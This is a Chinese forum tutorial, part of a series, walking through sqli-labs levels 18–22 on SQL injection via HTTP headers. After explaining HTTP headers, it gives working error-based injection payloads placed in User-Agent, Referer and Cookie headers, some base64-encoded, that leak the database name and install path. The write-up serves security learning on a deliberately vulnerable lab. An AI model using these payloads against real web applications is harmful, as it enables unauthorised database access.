用户
搜索
  • TA的每日心情
    开心
    7 小时前
  • 签到天数: 193 天

    连续签到: 2 天

    [LV.7]常住居民III

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    63

    主题

    127

    帖子

    3258

    魔法币
    收听
    0
    粉丝
    8
    注册时间
    2020-10-2

    积极活跃奖

    发表于 2021-7-29 09:19:59 11890
    本帖最后由 Johnson666 于 2021-8-5 16:56 编辑

    sqli-labs学习sql注入——HTTP头部注入篇

    本篇文章作者Johnson666,本篇文章参与i春秋作家连载计划所属从0到1团队,未经许可禁止转载。连载方向:web安全,内网安全

    目录

    1.sqli-labs学习sql注入——MySQL注入相关知识点+联合注入篇

    2.sqli-labs学习sql注入——GET和POST盲注篇+sql传马篇+增删改注入篇

    3.sqli-labs学习sql注入——绕过篇

    4.sqli-labs学习sql注入——HTTP头部注入篇

    5.sqli-labs学习sql注入——宽字节注入篇

    6.sqli-labs学习sql注入——堆叠注入篇

    7.sqli-labs学习sql注入——排序注入和排序堆叠注入篇

    8.sqli-labs学习sql注入——最后的挑战

    1.HTTP头部信息的知识点

    1.HTTP头部详解

    1、 Accept:告诉WEB服务器自己接受什么介质类型,/ 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。

    2、Accept-Charset: 浏览器申明自己接收的字符集

    Accept-Encoding: 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法(gzip,deflate)

    Accept-Language::浏览器申明自己接收的语言

    语言跟字符集的区别:中文是语言,中文有多种字符集,比如big5,gb2312,gbk等等。

    3、Accept-Ranges:WEB服务器表明自己是否接受获取其某个实体的一部分(比如文件的一部分)的请求。bytes:表示接受,none:表示不接受。

    4、 Age:当代理服务器用自己缓存的实体去响应请求时,用该头部表明该实体从产生到现在经过多长时间了。

    5、Authorization:当客户端接收到来自WEB服务器的 WWW-Authenticate 响应时,用该头部来回应自己的身份验证信息给WEB服务器。

    6、 Cache-Control:请求:no-cache(不要缓存的实体,要求现在从WEB服务器去取)

    max-age:(只接受 Age 值小于 max-age 值,并且没有过期的对象)

    max-stale:(可以接受过去的对象,但是过期时间必须小于 max-stale 值)

    min-fresh:(接受其新鲜生命期大于其当前 Age 跟 min-fresh 值之和的缓存对象)

    响应:public(可以用 Cached 内容回应任何用户)

    private(只能用缓存内容回应先前请求该内容的那个用户)

    no-cache(可以缓存,但是只有在跟WEB服务器验证了其有效后,才能返回给客户端)

    max-age:(本响应包含的对象的过期时间)

    ALL: no-store(不允许缓存)

    7、 Connection:请求:close(告诉WEB服务器或者代理服务器,在完成本次请求的响应后,断开连接,不要等待本次连接的后续请求了)。

    keepalive(告诉WEB服务器或者代理服务器,在完成本次请求的响应后,保持连接,等待本次连接的后续请求)。

    响应:close(连接已经关闭)。

    keepalive(连接保持着,在等待本次连接的后续请求)。

    Keep-Alive:如果浏览器请求保持连接,则该头部表明希望 WEB 服务器保持连接多长时间(秒)。例如:Keep-Alive:300

    8、 Content-Encoding:WEB服务器表明自己使用了什么压缩方法(gzip,deflate)压缩响应中的对象。例如:Content-Encoding:gzip

    9、Content-Language:WEB 服务器告诉浏览器自己响应的对象的语言。

    10、Content-Length: WEB 服务器告诉浏览器自己响应的对象的长度。例如:Content-Length: 26012

    11、Content-Range: WEB 服务器表明该响应包含的部分对象为整个对象的哪个部分。例如:Content-Range: bytes 21010-47021/47022

    12、Content-Type: WEB 服务器告诉浏览器自己响应的对象的类型。例如:Content-Type:application/xml

    13、 ETag:就是一个对象(比如URL)的标志值,就一个对象而言,比如一个 html 文件,如果被修改了,其 Etag 也会别修改,所以ETag 的作用跟 Last-Modified 的作用差不多,主要供 WEB 服务器判断一个对象是否改变了。比如前一次请求某个 html 文件时,获得了其 ETag,当这次又请求这个文件时,浏览器就会把先前获得的 ETag 值发送给WEB 服务器,然后 WEB 服务器会把这个 ETag 跟该文件的当前 ETag 进行对比,然后就知道这个文件有没有改变了。

    14、 Expired:WEB服务器表明该实体将在什么时候过期,对于过期了的对象,只有在跟WEB服务器验证了其有效性后,才能用来响应客户请求。是 HTTP/1.0 的头部。例如:Expires:Sat, 23 May 2009 10:02:12 GMT

    15、 Host:客户端指定自己想访问的WEB服务器的域名/IP 地址和端口号。例如:Host:rss.sina.com.cn

    16、 If-Match:如果对象的 ETag 没有改变,其实也就意味著对象没有改变,才执行请求的动作。

    17、If-None-Match:如果对象的 ETag 改变了,其实也就意味著对象也改变了,才执行请求的动作。

    18、 If-Modified-Since:如果请求的对象在该头部指定的时间之后修改了,才执行请求的动作(比如返回对象),否则返回代码304,告诉浏览器 该对象没有修改。例如:If-Modified-Since:Thu, 10 Apr 2008 09:14:42 GMT

    19、If-Unmodified-Since:如果请求的对象在该头部指定的时间之后没修改过,才执行请求的动作(比如返回对象)。

    20、 If-Range:浏览器告诉 WEB 服务器,如果我请求的对象没有改变,就把我缺少的部分给我,如果对象改变了,就把整个对象给我。浏览器通过发送请求对象的 ETag 或者 自己所知道的最后修改时间给 WEB 服务器,让其判断对象是否改变了。总是跟 Range 头部一起使用。

    21、 Last-Modified:WEB 服务器认为对象的最后修改时间,比如文件的最后修改时间,动态页面的最后产生时间等等。例如:Last-Modified:Tue, 06 May 2008 02:42:43 GMT

    22、 Location:WEB 服务器告诉浏览器,试图访问的对象已经被移到别的位置了,到该头部指定的位置去取。例如:Location:

    23、 Pramga:主要使用 Pramga: no-cache,相当于 Cache-Control: no-cache。例如:Pragma:no-cache

    24、 Proxy-Authenticate: 代理服务器响应浏览器,要求其提供代理身份验证信息。Proxy-Authorization:浏览器响应代理服务器的身份验证请求,提供自己的身份信息。

    25、 Range:浏览器(比如 Flashget 多线程下载时)告诉 WEB 服务器自己想取对象的哪部分。例如:Range: bytes=1173546-

    26、 Referer:浏览器向 WEB 服务器表明自己是从哪个 网页/URL 获得/点击 当前请求中的网址/URL。例如:Referer:http://www.sina.com/

    27、 Server: WEB 服务器表明自己是什么软件及版本等信息。例如:Server:Apache/2.0.61 (Unix)

    28、 User-Agent: 浏览器表明自己的身份(是哪种浏览器)。例如:User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14

    29、 Transfer-Encoding: WEB 服务器表明自己对本响应消息体(不是消息体里面的对象)作了怎样的编码,比如是否分块(chunked)。例如:Transfer-Encoding: chunked

    30、 Vary: WEB服务器用该头部的内容告诉 Cache 服务器,在什么条件下才能用本响应所返回的对象响应后续的请求。假如源WEB服务器在接到第一个请求消息时,其响应消息的头部为:Content- Encoding: gzip; Vary: Content-Encoding那么 Cache 服务器会分析后续请求消息的头部,检查其 Accept-Encoding,是否跟先前响应的 Vary 头部值一致,即是否使用相同的内容编码方法,这样就可以防止 Cache 服务器用自己 Cache 里面压缩后的实体响应给不具备解压能力的浏览器。例如:Vary:Accept-Encoding

    31、 Via: 列出从客户端到 OCS 或者相反方向的响应经过了哪些代理服务器,他们用什么协议(和版本)发送的请求。当客户端请求到达第一个代理服务器时,该服务器会在自己发出的请求里面添 加 Via 头部,并填上自己的相关信息,当下一个代理服务器收到第一个代理服务器的请求时,会在自己发出的请求里面复制前一个代理服务器的请求的Via 头部,并把自己的相关信息加到后面,以此类推,当 OCS 收到最后一个代理服务器的请求时,检查 Via 头部,就知道该请求所经过的路由。例如:Via:1.0 236.D0707195.sina.com.cn:80 (squid/2.6.STABLE13)

    2.使用工具

    下面我都是用的Burp Suite来抓包、改包和放包的。也可以使用Fiddler等等。

    Less-18:POST型User-Agent注入

    这一关关卡只是提示有关HTTP头部的注入,那么我们直接先看源代码:

    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    这里对uname和passwd进行了check_input()函数的处理,所以我们在输入uname和passwd上进行注入是不行的,但是在源码中,有这句:$insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent', '$IP', $uname)";它的意思是将User-Agent和ip插入到数据库中,既然插入到数据库中,那就可以用这个来进行注入了。

    因为IP地址在这里修改不是很方便,但是User-Agent修改比较方便,那么我就从它来注入。

    我是用burpsuite来进行抓包测试

    这里用admin/admin登录,burpsuite抓包修改User-Agent信息再放包,登录成功后发现该页面返回了我修改后的User-Agent信息。

    在burp中抓包测试,先抓包,然后发到Repeater模块测试。输入',发现报错,因此可以通过报错注入进行数据获取。

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1

    构造payload:' and updatexml(1,concat(0x7e,(select database()),0x7e),1)='1,在回显结果中可以发现报错结果,成功爆出库名。这里注意一点,原来的User-Agent可以不删除,直接把payload插在后面。我这里为了更容易看的出来就全删了。

    Less-19:POST型Referer注入

    从关卡题目中我们读取到了是有关HTTP头部的Referer注入。从源代码中可以看到获取到的是HTTP_REFERER,因此就是和Less-18的思路差不多一样的,不过是从Refer进行修改。

    这里就贴个payload,是报错注的:

    'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1

    便可以看到库名了。

    Less-20:POST型cookie注入

    从这一关关卡题目中我们读取到了是有关cookie的注入。从源代码中可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。也是因为源码中这里会把cookie带到数据库里select(查询),所以这里可能会存在SQL注入的cookie注入。

    $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";        //这里$cookee就是cookie的值

    我用admin/admin页面登陆成功后,发现修改cookie然后再次刷新时,这时候sql语句就被修改了。

    这里先来简单介绍下cookie的机制:

    当用户第一次访问并登陆一个网站的时候,cookie的设置以及发送会经历以下4个步骤:

    客户端发送一个请求到服务器 --> 服务器发送一个HttpResponse响应到客户端,其中包含Set-Cookie的头部 --> 客户端保存cookie,之后向服务器发送请求时,HttpRequest请求中会包含一个Cookie的头部 -->服务器返回响应数据

    所以这里我们首先得用admin/admin登录成功,这时候请求包这里还没有cookie

    然后服务器发送一个HttpResponse响应到客户端,其中包含Set-Cookie的头部

    然后这时候再把Proxy里的包都放(Forward)了,可以看到页面变成了这样

    这时候再用burp重新拦截,再刷新下网站,这时候我们的请求包里才有了cookie

    再次发到Repeater模块里,构造payload:Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#,Go一下,发现响应包里便出现报错了,我们便得到了mysql数据库的路径。

    这里我是为了更直观的讲解所以用burp抓包来注入,其实也可以直接F12修改cookie来进行注入,payload:admin' and extractvalue(1,concat(0x7e,(select database()),0x7e))#,成功得到库名:

    Less-21:POST型单引号cookie base64注入

    admin/admin登录成功后,发现对cookie的信息进行了base64的处理,其他的处理流程都是和Less-20是一样的。

    源码部分:

    setcookie('uname', base64_encode($row1['username']), time()+3600);  //服务器将username的值用base64加密,然后发送给客户端作为cookie
    
    $cookee = base64_decode($cookee); //将base64加密的cookie的值base64解密
    echo "<br></font>";
    $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";  //用base64解密的值,即username的值放到数据库里查询

    所以这里我们输入的username为admin,本来客户端的cookie应该就是admin,可是这里cookie却为YWRtaW4=。

    这里用base64编码工具解码一下,结果就是admin了

    那么我们这里也是先判断注入类型:

    构造admin',然后base加密变成YWRtaW4n,再注入到cookie里:

    Cookie: uname=YWRtaW4n,Go一下,发现响应包里出现报错:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'') LIMIT 0,1' at line 1

    所以这里是单引号注入。

    然后构造报错注入payload:admin' and updatexml(1,concat(0x7e,database()),1)='1。base64加密后为:YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKT0nMQ==。注入到cookie里,发现响应包里有报错,我们便得到了库名:XPATH syntax error: '~security'

    Less-22:POST型双引号cookie base64注入

    这一关和21关类似,就只是将单引号注入换成了双引号注入。

    base64前的payload:admin" and updatexml(1,concat(0x7e,database()),1)="1

    base64后的payload:YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKT0iMSA=

    出现报错,我们便得到库名:XPATH syntax error: '~security'

    base64是编码方式,是为了方便数据在网络中传输,不是加密算法,没有“base64加密”这种说法,encode是编码,decode是解码。
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册